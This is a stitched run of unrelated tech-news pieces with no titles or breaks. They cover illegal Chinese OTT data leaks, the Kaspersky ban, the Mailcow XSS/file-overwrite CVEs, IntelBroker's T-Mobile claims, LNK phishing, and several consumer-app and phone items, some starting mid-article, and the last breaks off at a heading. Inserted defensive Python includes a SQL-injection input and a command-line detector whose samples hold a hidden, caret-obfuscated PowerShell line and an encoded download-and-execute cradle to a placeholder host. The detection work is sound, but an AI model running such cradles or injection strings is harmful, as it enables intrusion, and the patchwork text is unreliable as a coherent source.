A recent rise in data breaches from illegal Chinese OTT platforms exposes that user information, including names and financial details, is vulnerable to exploitation by criminals.
The leaked information can be used for phishing attacks, financial fraud, and even harassment, as these illegal OTT services often operate under the radar.
This makes it difficult to hold them accountable and further increases the risk of user data exposure.
Illegal Chinese OTT services are leaking user data through vulnerabilities in HFS (HTTP File Server) used for file sharing.
HFS, a standalone executable web service, allows uploading and sharing videos and files but suffers from security weaknesses that expose this data.
It is especially concerning for servers using the unstable 2.3 beta version of HFS, which is riddled with vulnerabilities and easily compromised by hackers.
Users can potentially identify illegal servers located in China by leveraging the asset search function within a tool called Criminal IP, which exploits a vulnerability in some web servers, specifically those using the “HFS” (HTTP File Server) protocol.
Search results on Criminal IP for HFS
By crafting a query such as title: "HFS/" within Criminal IP, the tool searches for servers with this signature, potentially revealing unsecured or malicious servers operating in China, relying on the assumption that servers employing outdated or vulnerable protocols are more likely to be involved in illegal activities.
Personal information exposed in TXT files
HFS server version 2.3 beta, used by illegal OTT platforms, exposes sensitive user data in plain-text files within the server’s output folder. Files named “Login Denied” and “Authentication Code” contain user information including names, addresses, phone numbers, and even credit card details, potentially affecting a large number of South Korean users and raising security concerns for the platform and its users.
Illegal Chinese OTT sites operating while changing domains
Domain fluxing, the rapid changing of domain addresses, is a method illegal OTT service operators use to avoid being caught and to get around government oversight. It makes these services harder to shut down and leaves users exposed to data breaches, because no strong security protocols are in place.
According to Criminal IP, to counter these evasive tactics, law enforcement and content providers should focus on identifying and blocking these services at the network level, independent of their ephemeral domain names.
It can be achieved through techniques such as IP address blocking, traffic filtering, and collaborating with internet service providers (ISPs) to disrupt the distribution of illegal content.
The US government will ban the sale of Kaspersky antivirus products to new customers in the United States starting July 20, with a follow-on deadline to prohibit the cybersecurity company from providing users with software updates after September 29.
The move follows years of allegations that the cybersecurity firm served as a hacking conduit for Russian intelligence agencies—allegations that the company has consistently denied.
While current US Kaspersky customers will see no immediate impact from the ban, the September 29 software update deadline signals a bigger change. Without available updates, any cybersecurity product becomes less secure over time, which means the company won’t be able to protect customers against the newest threats.
In a briefing call with reporters on Thursday, US Department of Commerce Secretary Gina Raimondo offered consolation and advice to current customers of the antivirus products:
“You have done nothing wrong, and you are not subject to any criminal or civil penalties. However, I would encourage you, in as strong as possible terms, to immediately stop using that software and switch to an alternative in order to protect yourself and your data and your family.”
“Kaspersky does not engage in activities which threaten US national security and, in fact, has made significant contributions with its reporting and protection from a variety of threat actors that targeted US interests and allies,” the company said. “The company intends to pursue all legally available options to preserve its current operations and relationships.”
The ban, first reported by Reuters and released Thursday, includes “AO Kaspersky Lab,” “OOO Kaspersky Group,” and “Kaspersky Labs Limited.”
According to the US Department of Commerce, all three Kaspersky entities are being banned “for their cooperation with Russian military and intelligence authorities in support of the Russian government’s cyber intelligence objectives.”
In October 2017, The New York Times reported that Israeli intelligence officers managed to catch Russian government hackers using Kaspersky to conduct clandestine searches across the globe. That reporting followed a bombshell investigation from The Wall Street Journal that claimed that Russian hackers stole classified NSA materials from a contractor’s personal computer which had Kaspersky software installed on it.
In the same Thursday briefing call, Secretary Raimondo cited the threat of Russian influence in the Department’s decision to ban Kaspersky:
“Russia has shown it has the capacity and… the intent to exploit Russian companies like Kaspersky to collect and weaponize the personal information of Americans and that is why we are compelled to take the action that we are taking today.”
On the left-hand side, you have album info: name, band, artist, release date, track count, total length, and description from Wikipedia that you can expand. You then have a play/pause button, and options to download, save to the library, share, and an overflow menu.
Songs appear at the right.
Playlists are getting the same treatment for a dense look that takes advantage of the larger screens on laptops and desktops. This is a great new addition to the YouTube Music web player look, and it makes it more convenient just like the app.
YouTube Music has been getting some update love recently in order to better rival the likes of Spotify and Apple Music. For example, YouTube Music is now working on an AI feature that will let you ask for music, and also you’ll be getting the option to upvote playlists just like Spotify soon.
Izzy, a tech enthusiast and a key part of the PhoneArena team, specializes in delivering the latest mobile tech news and finding the best tech deals. Her interests extend to cybersecurity, phone design innovations, and camera capabilities. Outside her professional life, Izzy, a literature master’s degree holder, enjoys reading, painting, and learning languages. She’s also a personal growth advocate, believing in the power of experience and gratitude. Whether it’s walking her Chihuahua or singing her heart out, Izzy embraces life with passion and curiosity.
Two critical vulnerabilities (CVE-2024-31204 and CVE-2024-30270) affecting Mailcow versions before 2024-04 allow attackers to execute arbitrary code on the server.
An attacker can exploit these vulnerabilities by sending a specially crafted email to an administrator.
When the administrator views the email while logged into the admin panel, the attacker can inject malicious scripts and gain complete control of the server.
Mailcow’s PHP admin panel uses a custom exception handler to store error messages in the user session; they are then retrieved and displayed in an alert box on the next page load.
Result
The process involves parsing the session data, injecting the error messages into a JavaScript function call within a template, and finally rendering an alert box using a JavaScript library upon receiving the message in the browser.
It creates a vulnerability because the error messages are not sanitized before being displayed, potentially allowing attackers to inject malicious scripts.
CVE-2024-31204 is an XSS vulnerability in MailCow’s admin panel that exists because the jQuery-based notification library doesn’t escape HTML entities properly, allowing attackers to inject malicious scripts by controlling the content of an exception being raised.
resulting string representation
The attacker can achieve this because the exception handler uses print_r() to include function call stack arguments in the error message, which bypasses Twig’s escaping mechanism.
By sending a malicious email with a background image that references the vulnerable API endpoint with a specially crafted URL, an attacker can exploit the explode() function in json_api.php by providing an array as input through a crafted query string.
The email client, bypassing restrictions due to the relative URL, executes the script embedded in the query string, injecting an XSS payload into the victim’s session for exploitation upon their next visit to the admin panel.
malicious request
SonarCloud discovered a vulnerability (CVE-2024-30270) in MailCow’s rspamd_maps function that allows an attacker to overwrite arbitrary files. It stems from insufficient validation of user-supplied input, which lets an attacker craft a path traversal payload to overwrite system files.
While this vulnerability can’t be used for arbitrary file creation due to existence checks, an attacker could overwrite critical PHP files with malicious code to compromise the server.
An attacker can exploit a writable template cache directory in Mailcow’s Twig templating engine, and by overwriting a compiled template file with malicious code, the attacker can execute arbitrary commands when the corresponding page is accessed.
While Mailcow’s disabled PHP functions mitigate this, the mail() function remains enabled, allowing attackers to craft emails with multi-stage payloads to bypass these restrictions and execute commands on the server.
The mailcow maintainers addressed the XSS vulnerability (CVE-2024-31204) by encoding all HTML special characters in exception details before rendering them in the template.
For the file path vulnerability (CVE-2024-30270), they strengthened the validation logic to ensure only allowed map types are used.
Additionally, they implemented new security measures to prevent similar attacks in the future by adding checks to differentiate between API requests and normal web requests by looking for specific headers sent by browsers, such as the Referer header and the Sec-Fetch-Dest header.
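The three mitigations just described, as an added example that is not Mailcow’s own code: a Python rendition (Mailcow itself is PHP) of entity-encoding exception details before they reach the alert template, an allow-list for map types so traversal sequences never become file paths, and a header check that separates the admin UI’s own fetch/XMLHttpRequest calls from browser subresource loads such as an email background image. ALLOWED_MAP_TYPES, MAPS_DIR and the own_origin value are placeholders assumed for this example, and the Sec-Fetch-Dest and Referer rules are this example’s interpretation of the header check the text mentions, not Mailcow’s exact logic.

```python
import html

# Hypothetical allow-list of rspamd map names (constructed for this example;
# not Mailcow's actual list). Only these names may ever be turned into paths.
ALLOWED_MAP_TYPES = {"global_rcpt_bl", "global_smtp_from_bl", "custom_bl"}
MAPS_DIR = "/srv/rspamd-maps"   # assumed location, not Mailcow's real path


def render_alert_vulnerable(exc, call_args):
    """'Before' (CVE-2024-31204 pattern): the exception text and the call-stack
    arguments are placed in the alert HTML as-is, so a tag carried inside an
    argument is rendered as markup instead of shown as text."""
    details = f"{type(exc).__name__}: {exc} args={call_args!r}"
    return f'<div class="alert">{details}</div>'


def render_alert_fixed(exc, call_args):
    """'After': every HTML special character in the details is entity-encoded
    before the string is handed to the template, so it can only render as text."""
    details = f"{type(exc).__name__}: {exc} args={call_args!r}"
    return f'<div class="alert">{html.escape(details, quote=True)}</div>'


def is_allowed_map_type(map_type):
    """Strict allow-list (CVE-2024-30270 pattern): the value must be exactly one
    of the known map names, so '..' sequences or other file names never reach
    the filesystem. No normalisation is attempted; anything unknown is rejected."""
    return map_type in ALLOWED_MAP_TYPES


def map_path(map_type):
    """Build the on-disk path for a map, refusing anything outside the allow-list."""
    if not is_allowed_map_type(map_type):
        raise ValueError(f"rejected map type: {map_type!r}")
    return f"{MAPS_DIR}/{map_type}.map"


def accept_session_api_call(headers, own_origin="https://mail.example.invalid"):
    """Decide whether a session-authenticated request may reach the JSON API.

    Browsers send Sec-Fetch-Dest: empty for fetch()/XMLHttpRequest calls made by
    the admin UI, but 'image' for an <img> or CSS background-image load and
    'document' for a navigation. A request that carries the header with any
    value other than 'empty' is therefore not the UI's own API call. When a
    Referer is present it must point at our own origin (placeholder value).
    Requests without either header (non-browser API clients) are accepted here
    and left to the API-key checks elsewhere. Interpretation for this example."""
    h = {k.lower(): v for k, v in headers.items()}
    dest = h.get("sec-fetch-dest")
    if dest is not None and dest != "empty":
        return False                      # subresource or navigation, not an XHR
    referer = h.get("referer")
    if referer is not None and not referer.startswith(own_origin + "/"):
        return False                      # cross-origin page triggered the request
    return True


if __name__ == "__main__":
    boom = ValueError("lookup failed")
    print(render_alert_vulnerable(boom, ["<script>x</script>"]))
    print(render_alert_fixed(boom, ["<script>x</script>"]))
    print(map_path("custom_bl"), is_allowed_map_type("../custom_bl"))
    print(accept_session_api_call({"Sec-Fetch-Dest": "image"}))
```

The allow-list check is deliberately an exact set membership rather than a sanitiser: a function that strips `..` or normalises the path still has to reason about every encoding a client might send, while a fixed set of names has nothing to get wrong.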
A moderator of the notorious data breach trading platform BreachForums is offering data for sale they claim comes from a data breach at T-Mobile.
The moderator, going by the name of IntelBroker, describes the data as containing source code, SQL files, images, Terraform data, t-mobile.com certifications, and “Siloprograms.” (We’ve not heard of siloprograms, and can’t find a reference to them anywhere, so perhaps it’s a mistranslation or typo.)
Post offering data for sale supposedly from a T-Mobile internal breach
To prove they had the data, IntelBroker posted several screenshots showing access with administrative privileges to a Confluence server and T-Mobile’s internal Slack channels for developers.
But according to sources known to BleepingComputer, the data shared by IntelBroker actually consists of older screenshots. These screenshots show T-Mobile’s infrastructure, posted at a known—yet unnamed—third-party vendor’s servers, from where they were stolen.
When we looked at the screenshots IntelBroker attached to their post, we spotted something interesting in one of them.
Found CVE-2024-1597
This screenshot shows a search query for a critical vulnerability in Jira, a project management tool used by teams to plan, track, release and support software. It’s typically a place where you could find the source code of works in progress.
The search returns the result CVE-2024-1597, a SQL injection vulnerability. SQL injection happens when a cybercriminal injects malicious SQL code into a form on a website, such as a login page, instead of the data the form is asking for. The vulnerability affects Confluence Data Center and Server according to Atlassian’s May security bulletin.
For a better understanding, it’s important to note that Jira and Confluence are both products created by Atlassian, where Jira is the project management and issue tracking tool and Confluence is the collaboration and documentation tool. They are often used together.
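The mechanism in the definition of SQL injection above, as an added example that is not from the original article and not Atlassian’s code: a minimal login check in Python with sqlite3, first with the form values concatenated into the SQL text and then with bound parameters. The users table, the account name and the password-hash strings are constructed sample data.

```python
import sqlite3


def make_demo_db():
    """In-memory user table with one constructed account (sample data, not real)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES ('alice', 'hash-of-alice-password')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password_hash):
    """'Before': the form values are pasted into the statement text, so a quote
    character in the input changes the query's structure instead of being
    compared as data. The whole statement is logged so the effect is visible."""
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + username
           + "' AND password_hash = '" + password_hash + "'")
    print("executing:", sql)
    return conn.execute(sql).fetchone()[0] > 0


def login_parameterized(conn, username, password_hash):
    """'After': placeholders send the values separately from the statement text,
    so the database engine treats them purely as data whatever they contain."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(sql, (username, password_hash)).fetchone()[0] > 0


def run_demo():
    """Same inputs through both versions; returns the four outcomes."""
    conn = make_demo_db()
    good = ("alice", "hash-of-alice-password")
    # A username that closes the quote and comments out the password check.
    crafted = ("alice' --", "wrong-hash")
    return {
        "vulnerable_good": login_vulnerable(conn, *good),
        "vulnerable_crafted": login_vulnerable(conn, *crafted),
        "parameterized_good": login_parameterized(conn, *good),
        "parameterized_crafted": login_parameterized(conn, *crafted),
    }


if __name__ == "__main__":
    for name, ok in run_demo().items():
        print(f"{name:24} login accepted: {ok}")
```

The parameterized version is the fix; the logged statement from the vulnerable version is also what a database audit log would show, which is why a query containing a comment marker right after a quoted value is a useful thing to alert on.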
If IntelBroker has a working exploit for the SQL injection vulnerability, this could also explain their claim that they have the source code of three internal tools used at Apple, including a single sign-on authentication system known as AppleConnect.
This theory is supported by the fact that IntelBroker is also offering a Jira zero-day for sale.
IntelBroker selling zero-day for Jira
“I’m selling a zero-day RCE for Atlassian’s Jira.
Works for the latest version of the desktop app, as well as Jira with confluence.
No login is required for this, and works with Okta SSO.”
If this is true then this exploit, or its fruits, might be used for data breaches that involve personal data.
Meanwhile, T-Mobile has denied it has suffered a breach, saying it is investigating whether there has been a breach at a third-party provider.
“We have no indication that T-Mobile customer data or source code was included and can confirm that the bad actor’s claim that T-Mobile’s infrastructure was accessed is false.”
LNK files, a shortcut file type in Windows OS, provide easy access to programs, folders, or websites.
Created automatically during shortcut creation or manually by users, LNK files contain the target location and other information useful for threat intelligence.
These details include the identifier of the machine on which the LNK was built, volume labels, and drive serial numbers. Because the .lnk extension is hidden by default in Windows, identifying a shortcut relies on user awareness or command-line queries.
Attackers exploit LNK files, a shortcut file format, to bypass detection and deliver malware like Qakbot, Rhadamanthys, Remcos, and Amadey, which are disguised as legitimate files (executables or PDFs) and trick users into clicking on them.
Rhadamanthys LNK Phishing Campaign
A successful click compromises the user’s system or network. By analyzing active LNK phishing campaigns, defenders can learn attacker tactics, and tools like LECmd let them extract the contents of an LNK to better understand the attack.
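The forensic fields mentioned above (target path, volume label, drive serial number, command-line arguments and the machine identifier of the host where the shortcut was built), as an added example that is not part of the original article and not LECmd’s code: a small Python parser for the MS-SHLLINK layout together with a builder that constructs a sample shortcut to run it on. The builder only emits the structures the parser reads (no shell item ID list, an ANSI volume label, zeroed tracker GUIDs), and the target path, label, serial number and machine name are constructed values.

```python
import struct
import uuid

# Field layout follows MS-SHLLINK, the published Shell Link binary format.
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]  # LinkFlags -> StringData order
TRACKER_BLOCK_SIG = 0xA0000003  # ExtraData block carrying the builder's NetBIOS MachineID


def _cstring(data, offset):
    return data[offset:data.index(b"\x00", offset)].decode("latin-1")


def parse_lnk(data):
    """Pull the forensic fields out of a .lnk: target path, volume label, drive
    serial, command-line arguments and the MachineID of the host it was built on."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link: bad HeaderSize")
    if uuid.UUID(bytes_le=bytes(data[4:20])) != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    info, pos = {}, 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:                  # skip the shell item ID list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        li_size, _, li_flags, vol_off, base_off, _, _ = struct.unpack_from("<7I", data, pos)
        if li_flags & 0x01:                              # VolumeIDAndLocalBasePath present
            vol = pos + vol_off
            _, drive_type, serial, label_off = struct.unpack_from("<4I", data, vol)
            info["drive_type"] = drive_type              # 3 == DRIVE_FIXED
            info["drive_serial"] = f"{serial:08X}"
            info["volume_label"] = _cstring(data, vol + label_off)
            info["local_base_path"] = _cstring(data, pos + base_off)
        pos += li_size
    for flag, name in STRING_FIELDS:                     # CountCharacters + characters
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos:pos + count * width]
            info[name] = raw.decode("utf-16-le" if width == 2 else "latin-1")
            pos += count * width
    while pos + 4 <= len(data):                          # ExtraData until TerminalBlock (< 4)
        size = struct.unpack_from("<I", data, pos)[0]
        if size < 4:
            break
        if struct.unpack_from("<I", data, pos + 4)[0] == TRACKER_BLOCK_SIG:
            info["machine_id"] = data[pos + 16:pos + 32].split(b"\x00", 1)[0].decode("latin-1")
        pos += size
    return info


def build_sample_lnk(target, arguments, volume_label, drive_serial, machine_id):
    """Constructed sample shortcut (not a captured file): header + LinkInfo +
    arguments + TrackerDataBlock, enough to exercise the parser above."""
    flags = HAS_LINK_INFO | 0x20 | IS_UNICODE            # 0x20 == HasArguments
    header = struct.pack("<I", 0x4C) + LNK_CLSID.bytes_le + struct.pack(
        "<IIqqqIiIHHII", flags, 0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    label = volume_label.encode("ascii") + b"\x00"
    volume_id = struct.pack("<4I", 16 + len(label), 3, drive_serial, 16) + label
    base = target.encode("ascii") + b"\x00"
    base_off = 28 + len(volume_id)
    suffix_off = base_off + len(base)
    link_info = struct.pack("<7I", suffix_off + 1, 28, 1, 28, base_off, 0, suffix_off)
    link_info += volume_id + base + b"\x00"              # empty CommonPathSuffix
    string_data = struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    tracker = struct.pack("<4I", 0x60, TRACKER_BLOCK_SIG, 0x58, 0)
    tracker += machine_id.encode("ascii").ljust(16, b"\x00") + bytes(64)  # zeroed Droid GUIDs
    return header + link_info + string_data + tracker + struct.pack("<I", 0)


if __name__ == "__main__":
    sample = build_sample_lnk(r"C:\Windows\System32\cmd.exe", "/c echo hello",
                              "OS", 0x1A2B3C4D, "DESKTOP-BUILDER")
    for key, value in parse_lnk(sample).items():
        print(f"{key:16} {value}")
```

The MachineID and drive serial are the fields worth pivoting on: a batch of phishing shortcuts that share them were built on the same host, even when the lure document and the target command differ.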
Threat actors leverage LNK files in phishing campaigns to deploy malware and conduct reconnaissance, and this is done by embedding malicious scripts or commands within the LNK.
Upon user interaction, the LNK triggers these scripts, which can download malware, steal data, or gather system information.
LNK Recon
Examples include using LNK to download AsyncRAT or Rhadamanthys trojan, obfuscating PowerShell scripts using techniques like caret symbols, and crafting LNKs to resemble legitimate files like PDFs, which increases the success rate of tricking users into clicking the malicious LNK.
In one observed chain, a malicious LNK file uses a living-off-the-land binary (LOLBIN) to launch a PowerShell script that runs obfuscated commands; these decrypt encoded data embedded in the LNK and create a decoy DOCX file alongside a malicious CAB archive.
LNK Obfuscated PowerShell
The PowerShell script then utilizes expand.exe to extract the CAB file, which contains a VBScript, batch files, and a legitimate unzip.exe utility.
VBScript leverages a COM object to execute a batch file that establishes persistence via registry modification and executes additional batch files, which download malicious payloads, steal system information, and communicate with C2 servers.
LNK Attack Chain
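Detection logic for the command lines that chain produces, as an added example that is not part of the original article or of Splunk’s research: Python that undoes cmd.exe caret escaping (the p^o^w^e^r^s^h^e^l^l trick mentioned above), decodes a PowerShell -EncodedCommand payload if one is present, and scores each process command line against weighted indicators (PowerShell launch, hidden window, execution-policy bypass, expand.exe on a CAB, download cradles, dynamic evaluation). SAMPLE_COMMAND_LINES, the weights and the threshold are constructed for this example and would be tuned against real process-creation telemetry.

```python
import base64
import re

# Weighted indicators taken from the LNK -> cmd/PowerShell chains described above.
RULES = [
    (r"(?i)\bpowershell(\.exe)?\b",                        "launches PowerShell",            1),
    (r"(?i)-(w|windowstyle)\s+hidden\b",                   "hidden window",                  2),
    (r"(?i)-(ep|executionpolicy)\s+bypass\b",              "execution-policy bypass",        2),
    (r"(?i)\bexpand(\.exe)?\b.*\.cab\b",                   "CAB extraction with expand.exe", 2),
    (r"(?i)\b(iex|invoke-expression)\b",                   "dynamic code evaluation",        2),
    (r"(?i)downloadstring|downloadfile|invoke-webrequest", "download cradle",                2),
]
CARET_WEIGHT = 2      # a caret splitting a keyword, e.g. p^o^w^e^r^s^h^e^l^l
ENCODED_WEIGHT = 2    # an -EncodedCommand payload that decoded cleanly
THRESHOLD = 4         # constructed cut-off; tune against your own baseline


def strip_carets(cmdline):
    """Undo cmd.exe caret escaping: '^' makes the following character literal."""
    return re.sub(r"\^(.)", r"\1", cmdline)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text (base64 of UTF-16LE) or '' if absent/invalid."""
    m = re.search(r"(?i)\s-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze(cmdline):
    """Score one process command line; returns (score, findings)."""
    plain = strip_carets(cmdline)
    decoded = decode_encoded_command(plain)
    text = plain + " " + decoded          # match rules against the de-obfuscated view
    findings = [label for pattern, label, _ in RULES if re.search(pattern, text)]
    score = sum(w for _, label, w in RULES if label in findings)
    if re.search(r"\w\^\w", cmdline):     # caret inside a token is not normal escaping
        findings.append("caret-obfuscated token")
        score += CARET_WEIGHT
    if decoded:
        findings.append("encoded command decoded")
        score += ENCODED_WEIGHT
    return score, findings


def is_suspicious(cmdline):
    return analyze(cmdline)[0] >= THRESHOLD


# Constructed sample process-creation command lines (not real telemetry).
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
    .encode("utf-16-le")).decode("ascii")
SAMPLE_COMMAND_LINES = [
    r'cmd.exe /c p^o^w^e^r^s^h^e^l^l -w hidden -ep bypass -c "expand.exe C:\Users\Public\a.cab -F:* C:\Users\Public"',
    "powershell.exe -NoProfile -Command Get-ChildItem",
    "notepad.exe report.txt",
    "powershell.exe -NoP -enc " + _ENCODED,
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        score, findings = analyze(line)
        print(f"{score:2} {'ALERT' if score >= THRESHOLD else 'ok   '} {findings}")
```

Scoring against the de-obfuscated text rather than the raw command line is the point: a rule that looks for the literal string `powershell` never fires on the caret-split form, and a rule that looks for a download cradle never fires on the base64 form, so normalisation has to happen before matching. A single PowerShell launch on its own scores below the threshold, which keeps ordinary administrative use out of the alert queue.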
The research by Splunk describes three methods for simulating LNK phishing campaigns to test organizational defenses. The first method utilizes Atomic Red Team’s Invoke-AtomicTest to write an LNK to the startup folder that triggers a command prompt upon user login.
The second method uses LNK Generator, which simplifies creating desktop shortcuts with various functionalities.
Examples include generating a CMD shortcut or a PowerShell script shortcut that downloads and executes an MSI package.
The third method leverages Atomic Red Team tests to simulate a malicious LNK file embedded with a CAB file, and by examining real-world malicious LNK files, security analysts can gain insights to develop and test detection capabilities.
It’s mind-boggling how many lives have been destroyed since the rise of AI-generated content. The fact that you can’t do anything against AI deepfakes of yourself is one of the many issues people are confronted with.
Big social media companies like Meta and Google do very little to protect their customers’ privacy. YouTube has finally announced that it’s expanding its privacy request process to allow users to request the removal of AI-generated or other synthetic or altered content of themselves.
According to the company, the decision to take a more responsible approach to AI-generated content is related to the fact that AI deepfakes have become more common lately. In other words, they have received so much negative feedback that they’re now forced to make some changes.
In any case, those who would like to request the removal of their AI deepfake(s) must use YouTube’s privacy request process. The service will evaluate the request and consider “a variety of factors before removal,” such as whether the content is altered or synthetic and could be mistaken for real.
However, YouTube doesn’t seem to be too keen on removing what it tags as parody and satire content involving well-known figures. Obviously, YouTube will also check whether the person making the request is identifiable.
Last but not least, YouTube announced that creators notified about privacy complaints will not receive any strikes since privacy violations are separate from Community Guidelines strikes.
Instagram users now have the option to start Lives only accessible to members of their Close Friends list. Until now, you could only restrict live streams to individual profiles.
For a while now, Instagram has allowed you to create a Close Friends list. People included in the list can see the Stories and posts (pics/Reels) you upload through that option, while the rest of your contacts cannot. However, the feature still feels a bit lacking in functionality. It seems that Meta wants to start solving this since they announced a new privacy feature related to Lives.
Instagram now allows you to restrict Lives to Close Friends
An option to start Instagram Lives that only your Close Friends can access will now be available. This will help you quickly limit the number of people who can access your Lives, instead of having to waste a lot of time adding each individual profile to the restricted list. If you have thousands of followers, hiding your live streams from a certain audience could become a rather tedious process.
The new feature to restrict Instagram lives allows up to three people from your Close Friends list to join. According to Meta, this will allow you to quickly start more intimate Lives to organize things or do collaborative tasks. It would even open up new monetization possibilities for creators. They could offer private Lives for followers who pay a subscription, for example.
Instagram has also added other new features. Among them is the possibility of adding music to carousel posts that include videos. Until now, you could only do it with posts that included images. In addition, they reminded users that the Notes feature also supports videos. This is something many were unaware of, since most only upload music or text in their Notes. So, the company wanted to remind users how to get the most out of Instagram features.
For the average user, diagnosing potential hardware issues on their device can be a somewhat complicated process. However, Google wants to make this easier by integrating on-device diagnostics into Android 15. This will allow you to know if your phone has a fault in a key part before taking it for technical service. This joins privacy options such as Repair Mode which Pixels and some other brands have.
The on-device diagnostics tool was spotted by Android Authority in the latest Android 15 Beta 3. The option is not available by default, but it can be enabled. Once you have it, you can access it by going to Settings > System > Device Diagnostics.
The on-device diagnostics tool has two main display items: “Component health” and “Evaluation mode.” The “Component health” section will allow you to run manual tests on your phone/tablet. On the other hand, “Evaluation mode” allows you to evaluate your current device using another device.
This is what the Android 15 on-device diagnostics tool would be like
Starting with “Component health,” it includes screen integrity and touch performance tests. It also allows you to check the current status of your battery and storage chip. Regarding the battery, it shows data such as the percentage of remaining capacity, manufacturing date, first date of use, and even the number of charging cycles.
There are also entries for “serial number” and “part status.” These ones do not seem to be functional currently. Then, in storage status, you can check the remaining useful life of the storage chip, as well as its total capacity.
Moving on to “Evaluation mode,” it is a test where you will have to use another supported device. The process begins with scanning a QR, and some tests require internet access.
Useful to detect issues before going to technical service
Overall, the Android 15 on-device diagnostics tool will give you a pretty good general idea of the status of your device’s hardware. For example, it can help you detect potential issues with dead pixels, light leaks, or discoloration on screens. It also tells you how healthy your battery is. It’s noteworthy that there are some third-party apps that do similar tests. However, having a tool integrated directly into the OS is a welcome addition.
Both Samsung and Vivo released their ‘Ultra’ devices this year. Samsung’s came in January, while Vivo’s followed in May. We’re here to compare those two phones, the Samsung Galaxy S24 Ultra vs Vivo X100 Ultra. Do note that the Vivo X100 Ultra launched in China only, though. The phone does not have a global variant. The Vivo X100 Pro is basically the flagship model for global markets. We already compared that one to the Galaxy S24 Ultra, by the way.
With that in mind, we’ll check out the two ‘Ultra’ devices. Both of these phones are large and powerful, but also different in a number of ways. We’ll list their specifications, and will then move to compare their designs, displays, performance, battery life, cameras, and audio output. With that in mind, let’s get started, shall we?
Specs
Samsung Galaxy S24 Ultra vs Vivo X100 Ultra, respectively
Samsung Galaxy S24 Ultra vs Vivo X100 Ultra: Design
As you can see in the image above, the two phones look very different. The Galaxy S24 Ultra has sharp corners, while the opposite is true for the Vivo X100 Ultra. Both phones do have a centered display camera hole and very thin bezels around their displays. The Galaxy S24 Ultra includes a flat display, while the Vivo X100 Ultra has a curved display. The Vivo X100 Ultra does look narrower, that’s because it is. It’s considerably narrower than the Galaxy S24 Ultra while being slightly taller and thicker. It is also a couple of grams lighter.
The Galaxy S24 Ultra has a frame made out of titanium and a glass back. The Vivo X100 Ultra frame is made out of aluminum, while glass is included on its back. The Vivo X100 Ultra backplate curves into the frame on the sides, as does its front side. The Galaxy S24 Ultra is a lot more flat on the back, proportional to its front side. Both phones include physical buttons on the right-hand side.
The Galaxy S24 Ultra has four cameras on the back and five separate circles in the top-left corner. The Vivo X100 Ultra includes a large camera oreo on the back instead. There are three cameras in there, and that camera oreo is centered in the top portion of the phone’s back. Both phones are IP68 certified for water and dust resistance. Both of them are also very slippery, by the way. Glass is usually a recipe for slippery devices, and the same is the case here. They also feel different in the hand, but both have that premium feel to them.
Samsung Galaxy S24 Ultra vs Vivo X100 Ultra: Display
There is a 6.8-inch QHD+ (3120 x 1440) Dynamic LTPO AMOLED 2X display included on the Galaxy S24 Ultra. That display is flat, and it has an adaptive refresh rate of up to 120Hz. HDR10+ content is supported, and the phone’s display goes up to 2,600 nits. The display aspect ratio is 19.5:9, while the screen-to-body ratio is at around 88%. This display is protected by the Gorilla Glass Armor from Corning.
The Vivo X100 Ultra, on the flip side, has a 6.78-inch QHD+ (3200 x 1440) LTPO AMOLED display. This phone has a curved display. The panel can project up to 1 billion colors, and it also has an adaptive refresh rate of up to 120Hz. Dolby Vision is supported, as is HDR content. The maximum display brightness is set at 3,000 nits. The display aspect ratio here is 20:9, while the screen-to-body ratio is around 89%. There’s no info on display protection, though.
Both displays are vivid and very sharp, no problem there. They also have great viewing angles, and very good touch response as well. The blacks are deep, as they should be on AMOLED displays. The thing is, the Gorilla Armor on the Galaxy S24 Ultra does a much better job of keeping reflections at bay. It’s noticeably less reflective than displays on competitor phones, including the Vivo X100 Ultra. That much is worth noting. Both displays get more than bright enough, even in direct sunlight.
Samsung Galaxy S24 Ultra vs Vivo X100 Ultra: Performance
The Snapdragon 8 Gen 3 for Galaxy fuels the Samsung Galaxy S24 Ultra. That is basically an overclocked Snapdragon 8 Gen 3. Samsung also included 12GB of LPDDR5X RAM on the Galaxy S24 Ultra. The same goes for UFS 4.0 flash storage. The Vivo X100 Ultra is fueled by the Snapdragon 8 Gen 3. The phone offers up to 16GB of LPDDR5X RAM and UFS 4.0 flash storage too.
In regards to performance, both phones do a wonderful job. Just keep in mind that the Vivo X100 Ultra doesn’t come with global software, so you’ll need to sideload Google services if you want to use them. They are extremely smooth when it comes to regular, everyday tasks like opening apps, multitasking, consuming multimedia, and so on. Slowing them down is not an easy feat, that’s for sure. They’re basically on par in that regard.
The same level of performance does transfer to gaming too, basically. Both of these phones offer great performance even with the most demanding games out there. They can run Genshin Impact without a problem. Yes, both phones will get rather warm if you end up playing demanding games for a while, but not too warm. The performance will also remain unscathed, pretty much, and that’s a win.
Samsung Galaxy S24 Ultra vs Vivo X100 Ultra: Battery
